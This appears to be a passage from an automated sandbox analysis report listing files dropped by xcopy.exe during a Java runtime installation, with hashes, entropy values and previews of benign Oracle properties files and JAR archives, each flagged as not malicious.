                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F.error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF.error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF.error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25.error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25.error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25.error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3.error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E.error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B.error.splash.exit=Java
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3752
                                                                                                                                                                                                                                  Entropy (8bit):5.14936903006307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zMWCQv8u9/IzdG/JvFWlHaQzWy/owZFomWdYQCfQ/ydQCyJ:gWCQv7VIxG/JodaQ7PoHWQaQ/6QCY
                                                                                                                                                                                                                                  MD5:880BAACB176553DEAB39EDBE4B74380D
                                                                                                                                                                                                                                  SHA1:37A57AAD121C14C25E149206179728FA62203BF0
                                                                                                                                                                                                                                  SHA-256:FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
                                                                                                                                                                                                                                  SHA-512:3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F.error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4.error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4.error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557.error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557.error.recv.failed=Splash: recv \u5931\u6557.error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9.error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E.error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E.error.splash.exit=Java Web Start \u9583\u73FE\u87A2\u5E55\u8655\u7
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3752
                                                                                                                                                                                                                                  Entropy (8bit):5.14936903006307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zMWCQv8u9/IzdG/JvFWlHaQzWy/owZFomWdYQCfQ/ydQCyJ:gWCQv7VIxG/JodaQ7PoHWQaQ/6QCY
                                                                                                                                                                                                                                  MD5:880BAACB176553DEAB39EDBE4B74380D
                                                                                                                                                                                                                                  SHA1:37A57AAD121C14C25E149206179728FA62203BF0
                                                                                                                                                                                                                                  SHA-256:FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
                                                                                                                                                                                                                                  SHA-512:3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F.error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4.error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4.error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557.error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557.error.recv.failed=Splash: recv \u5931\u6557.error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9.error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E.error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E.error.splash.exit=Java Web Start \u9583\u73FE\u87A2\u5E55\u8655\u7
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 320 x 139
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8590
                                                                                                                                                                                                                                  Entropy (8bit):7.910688771816331
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                                                                                                                                                                                                                  MD5:249053609EAF5B17DDD42149FC24C469
                                                                                                                                                                                                                                  SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                                                                                                                                                                                                                  SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                                                                                                                                                                                                                  SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 640 x 278
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15276
                                                                                                                                                                                                                                  Entropy (8bit):7.949850025334252
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                                                                                                                                                                                                                  MD5:CB81FED291361D1DD745202659857B1B
                                                                                                                                                                                                                                  SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                                                                                                                                                                                                                  SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                                                                                                                                                                                                                  SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 320 x 139
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7805
                                                                                                                                                                                                                                  Entropy (8bit):7.877495465139721
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                                                                                                                                                                                                                  MD5:9E8F541E6CEBA93C12D272840CC555F8
                                                                                                                                                                                                                                  SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                                                                                                                                                                                                                  SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                                                                                                                                                                                                                  SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 640 x 278
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12250
                                                                                                                                                                                                                                  Entropy (8bit):7.901446927123525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                                                                                                                                                                                                                  MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                                                                                                                                                                                                                  SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                                                                                                                                                                                                                  SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                                                                                                                                                                                                                  SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):197117
                                                                                                                                                                                                                                  Entropy (8bit):7.792272631565105
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:6z8E+sJqq32wtQJr69+1vNmJqcv1KR5m3g/LPqM8USjfwK/+Sfu6hMEmJtooiN:V42bgEwv165mw/zB8jfx+6hMXmX
                                                                                                                                                                                                                                  MD5:DDF0062607C66277444DB65390969928
                                                                                                                                                                                                                                  SHA1:8012C383BD0FEBD9CF1FB59B3E18924D7AB5E507
                                                                                                                                                                                                                                  SHA-256:BB10E9B99CFB49BE68694B877457BC18C5112E24D41376B3A5ADC22C616ED27C
                                                                                                                                                                                                                                  SHA-512:E05A1D84398BED5BB83CF4E1AD37E2FFE8E494B0BDD61697934A35FCEA2034F0C7A1E3F0D1EB0BD78C25E8F9E7D35BEC4C3EB01CD11585CBDA75C95888B57624
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3861927
                                                                                                                                                                                                                                  Entropy (8bit):7.966923563095338
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:EkrHu5vfWwUesoIARg7oPA8HJMNdVdE9KW4hh6lyNkEex8Yg:EkrORUVqeoPAa6fnPygOFx5g
                                                                                                                                                                                                                                  MD5:66D182EB84391F8C7EEF9A880BA68CB5
                                                                                                                                                                                                                                  SHA1:F3CB80D60C2663E9430F5EC8AC7F21C3768E7960
                                                                                                                                                                                                                                  SHA-256:1499D65DF53BE5250956CC6B78BB7C2686F05BFF110C7117658DC35A73216D0F
                                                                                                                                                                                                                                  SHA-512:43BEC32B248ED8633BFCF5D7A21B43355C93222DF3FE11097A8A732145678922279E20243D5421F1532EAECD64C2A2C28C5A71E944C624B7F3FAAB7DF3EEB96F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8488
                                                                                                                                                                                                                                  Entropy (8bit):7.783962787395864
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XgUXHrd3Qa/pj55oNQYnrKcwP1CCzwKRTed:Xg4HZH/pj55IecJH
                                                                                                                                                                                                                                  MD5:B545A5C415ED12A6912FE414F45FF00F
                                                                                                                                                                                                                                  SHA1:F00C703C6167E112C45B7358BB27EFCA0F0E4F6E
                                                                                                                                                                                                                                  SHA-256:A13E4D3707073C15138394CB6B7A8FDDADB6BB02CD60CBD4867496C8DD5B3663
                                                                                                                                                                                                                                  SHA-512:8A3A5431DC355946EAC1DDCAB11C4EC787BC0466EBE6DD4AFBB19F0CDCB3587C3BE76C502F2629AA4C793DA6A1C4C5EDF3A1B6F16A8C9E43DF5A92B3FE737B79
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44517
                                                                                                                                                                                                                                  Entropy (8bit):7.9042816672520235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8YVmk7qfgKbWnXuZgQvfPTJrJoctkZQnWn109rq7mjE4y:8Kmk7WgfnXu5frTovQnWn10NqO3y
                                                                                                                                                                                                                                  MD5:C52FDCB96D827AC8B4182EB4A3294A0F
                                                                                                                                                                                                                                  SHA1:EBB110F771F622FF37C16C9FC803CFE1988EEF9F
                                                                                                                                                                                                                                  SHA-256:CE2FFFD81EAE0A0DB45915DDC56B9F53AF709843773074AC57BA7C6615BDE1B0
                                                                                                                                                                                                                                  SHA-512:CEAF3459A1DCCAC97EF8D6FC631FAAAB4845FFA1895779C254350BCD626B89E4E3E58A4EFA877B128EB85EDD11405D9C6B5C29A2F2132C4C285636ACA2B2F43B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18227164
                                                                                                                                                                                                                                  Entropy (8bit):5.970897504950222
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:qHkpSphO6GWdvHPWL9rkSqyM7IubKyv86E5Pl2pfIAGRbBlCNyzI5bCJma5PdEJE:qlVGsUASqOubKymFJLoI8osv4uAnHp
                                                                                                                                                                                                                                  MD5:9BB44D7704D64120416AA7110DE042A8
                                                                                                                                                                                                                                  SHA1:AF6330BA6981565251B85462FF9CF2BBD621AE6E
                                                                                                                                                                                                                                  SHA-256:88FEC8CBB84DF53D64F2F0B6DADF3D631E88A4AB42D675681612C9B66378F4C8
                                                                                                                                                                                                                                  SHA-512:2A2EF4C3FCD4E3D01519CF2028854B3F00781EC06481A11294A37C2799EEDA87C1B593C0D1C3C8DBE3956BF05123FDB4D6FFF33942370F22DBBFA06619C80DCB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK...........V................META-INF/....PK...........V@...i...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.5..Created-By: 1.8.0_261-b12 (Oracle Corporation)....PK...........V................com/PK...........V................com/sun/PK...........V................com/sun/deploy/PK...........V................com/sun/deploy/uitoolkit/PK...........V................com/sun/deploy/uitoolkit/impl/PK...........V............!...com/sun/deploy/uitoolkit/impl/fx/PK...........V............$...com/sun/deploy/uitoolkit/impl/fx/ui/PK...........V................com/sun/deploy/uitoolkit/impl/fx/ui/resources/PK...........V............4...com/sun/deploy/uitoolkit/impl/fx/ui/resources/image/PK...........V................com/sun/glass/PK...........V................com/sun/glass/events/PK...........V................com/sun/glass/ui/PK...........V................com/sun/glass/ui/delegate/PK...........V................com/sun/glass/ui/win/PK...........V................com/
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2207001
                                                                                                                                                                                                                                  Entropy (8bit):6.724283785186481
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:XAAaw4ejiUAJit3eOfeownKu9nftV+SAy:iw4eji9itutnHAy
                                                                                                                                                                                                                                  MD5:1ACD4D02F968B06FB7DCDFC7291961ED
                                                                                                                                                                                                                                  SHA1:F68EB01016034C2FF51533963DEEE1C75F922C3D
                                                                                                                                                                                                                                  SHA-256:DC30DC10C2ACECE3B92AD1B636F51FA7C571CBEF35180265746074D059F45135
                                                                                                                                                                                                                                  SHA-512:A4884FF83C3D99E972CBFC82D0C76C51848C30DCF1C04C8B7D33B15B876B7E9FA9CC7E93F00C3728A61E9216AE26C3D922F1AED9E0B5D23EAB0DD15A6DCC8DB4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1511
                                                                                                                                                                                                                                  Entropy (8bit):5.142622776492157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                                                                                                                                                                                                                  MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                                                                                                                                                                                                                  SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                                                                                                                                                                                                                  SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                                                                                                                                                                                                                  SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2035055
                                                                                                                                                                                                                                  Entropy (8bit):7.931988689505804
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:Eaoqk6DxnvxCsjj0QTHc/g2lv9XjalW996mrMZGA2O:EaoMVvrj9Tkg2pVWlMzMZh
                                                                                                                                                                                                                                  MD5:E65962BB555222712C678271E32F9E66
                                                                                                                                                                                                                                  SHA1:41D44D53A8F0E31E4ADF0F8AD7B47B82F253B581
                                                                                                                                                                                                                                  SHA-256:BB7BC9C48FE772B06F8642B7FE9594B66B42B780E2CC323A08261E9B3F5559DA
                                                                                                                                                                                                                                  SHA-512:6EB464F0191906A48322886082240FCDA204439EA5D50102522C5054017A0C341004934D96981E3DE67F04B38335CA5D8BAA3423C6CDD5B6403BD4DB5E5C5078
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47302
                                                                                                                                                                                                                                  Entropy (8bit):7.9145298971475
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:4731B13B5aguVlb2TUVMbLjwP7l6lxiHsWhoc2toqMmrV3lkwhEafSkjmPX+M6ij:2/7ggIYU6GlQ0Hnhoc2mvA3ewSafSZPd
                                                                                                                                                                                                                                  MD5:1227482C65DC231E3607B002950F5497
                                                                                                                                                                                                                                  SHA1:709FF3738D5DA8DB225818DF2966F04C13CB7D02
                                                                                                                                                                                                                                  SHA-256:CFE84C5292F9DDEF96FECF118377565BBAF769EEE7FF4CCA81652FE1134F9809
                                                                                                                                                                                                                                  SHA-512:87C4F5FA1E6DAD6F2FAB8A0371380FA7BE9F63B05F8FF6740A4208EC115F8DB9C512DE9E40B4B853BE35EFFED2804D0774C0E9426571A129CB6BDECD527CDB8C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):294661
                                                                                                                                                                                                                                  Entropy (8bit):7.902957816161981
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:5lQ8GTsacebwePne9NuAZ9ObVT/slrNoCawdxpFfGi8+jBuTW:5bAPce0l9NuAZwlsl1dP86B0W
                                                                                                                                                                                                                                  MD5:456031723EBC7270D9BC3747CDD6DAA2
                                                                                                                                                                                                                                  SHA1:A4A61BB10AC83F201854A11750AA86E7DC8DA41B
                                                                                                                                                                                                                                  SHA-256:324499CEDD3F19EA621A38F42834369D7DA8BDF40FCB5A345007BFA2E5987780
                                                                                                                                                                                                                                  SHA-512:B425EABD590F905AA147720AA507A0DA2B31199956F21137A722FE6C8DE05549D1CDDBB2FB2EA1CBE34E39CE9D0EABB0502DD2A9A09F72DD87CD002765537079
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49456
                                                                                                                                                                                                                                  Entropy (8bit):7.884181045232351
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:cKfrf9FJ546NJ9/JdybTw2EX4iVZ/OcW8R6t+vdZvWc8tv/D2rWYsYuOqMnI6ZDN:cHa2Ehz02mipLXN
                                                                                                                                                                                                                                  MD5:35F7968A28732E702CE7E1074BBC46ED
                                                                                                                                                                                                                                  SHA1:A09992FF24238D7E5925BD2F8DC01EC8A44F78F0
                                                                                                                                                                                                                                  SHA-256:2E42B9055905B163E7FB487845AC80627C9A9A5FDF9DD7C7983C52437E1D3375
                                                                                                                                                                                                                                  SHA-512:F56E1449B7765D031831EB85B85ADA1D0E468BA92E1E0BD48C065EEE7D3C97EF04E1F947773F18B0F6D41994530790AAFAC2EF85289685FE19A795EC62F8BD27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):293990
                                                                                                                                                                                                                                  Entropy (8bit):7.9569881676462195
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:DSjPjNwQ7jFzZLEjlC01sW44iG9qtrkb/V5lacOHW6SeE4b:DSjPGWFFLEJ71sW4G9kkb9OOeEG
                                                                                                                                                                                                                                  MD5:56CF160BC9F76015124FEE50604009B2
                                                                                                                                                                                                                                  SHA1:D9507468AF581CB31D7CCD171D06807487ED240D
                                                                                                                                                                                                                                  SHA-256:67D942B7262ABE5D85E1774B951251E5D1574761BD524B02C2093031D02C979E
                                                                                                                                                                                                                                  SHA-512:58B09C94C15E80FE059E3C28DE90CA90E6BB9E466ABCF82F5EBCA4AC4DBB6205CFD38E1383ED6B39AB6E598C377A77E80F16F5D2150462D57D7B599EEC53EEA3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):70025
                                                                                                                                                                                                                                  Entropy (8bit):7.950153872229724
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:ySElsJBO78JSjr/rG0zzxGU2j38NPrjp/bC:jElsJ078JS/rGVINnU
                                                                                                                                                                                                                                  MD5:EFAC3630C7DC7EC3555BE2CB16306E7D
                                                                                                                                                                                                                                  SHA1:B088CF302EF2BC3CB922597CC0B5DBA343F14CF5
                                                                                                                                                                                                                                  SHA-256:83DD05E11E585A956F1116E95178F791A3AB9D50078029820DE78A61F150742B
                                                                                                                                                                                                                                  SHA-512:BD5E559047BA13B19BF81060B65FD0A423D14867FE14DE292DC5165CD349E27E98C318D9C75CD5D4FD9C935232B473C3772A59B562F80B07C80C4A0EC87CB02A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3928
                                                                                                                                                                                                                                  Entropy (8bit):4.86616891434286
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pTgwOsORUjdjTD6QfxWkVIyiVyV2mjuVwwY:Jgw5TjdjTtpWk6ylV2zwwY
                                                                                                                                                                                                                                  MD5:D8B47B11E300EF3E8BE3E6E50AC6910B
                                                                                                                                                                                                                                  SHA1:2D5ED3B53072B184D67B1A4E26AEC2DF908DDC55
                                                                                                                                                                                                                                  SHA-256:C2748E07B59398CC40CACCCD47FC98A70C562F84067E9272383B45A8DF72A692
                                                                                                                                                                                                                                  SHA-512:8C5F3E1619E8A92B9D9CF5932392B1CB9F77625316B9EEF447E4DCE54836D90951D9EE70FFD765482414DD51B816649F846E40FD07B4FBDD5080C056ADBBAE6F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This properties file is used to initialize the default.# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-.# specific, default mappings between common Win32 Clipboard atoms and platform-.# independent MIME type strings, which will be converted into.# java.awt.datatransfer.DataFlavors..#.# These default mappings may be augmented by specifying the.#.# AWT.DnD.flavorMapFileURL .#.# property in the appropriate awt.properties file. The specified properties URL.# will be loaded into the SystemFlavorMap..#.# The standard format is:.#.# <native>=<MIME type>.#.# <native> should be a string identifier that the native platform will.# recognize as a valid data format. <MIME type> should specify both a MIME.# primary type and a MIME subtype separated by a '/'. The MIME type may include.# parameters, where each parameter is a key/value pair separated by '=', and.# where each parameter to the MIME type is separated by a ';'..#.# Because SystemFlavorMap implements Flavor
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3778
                                                                                                                                                                                                                                  Entropy (8bit):4.416740385938501
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iX/WgWWWW81dp83p3j7WOk4BxciETBT5BLrws+LW/Be6J2:iXtWWWW8/e53PNxci8juWW
                                                                                                                                                                                                                                  MD5:AD8365719B70A2DEADE79683D8986A15
                                                                                                                                                                                                                                  SHA1:88CBF37D05F28691B7F82E74FA891792E93B41B9
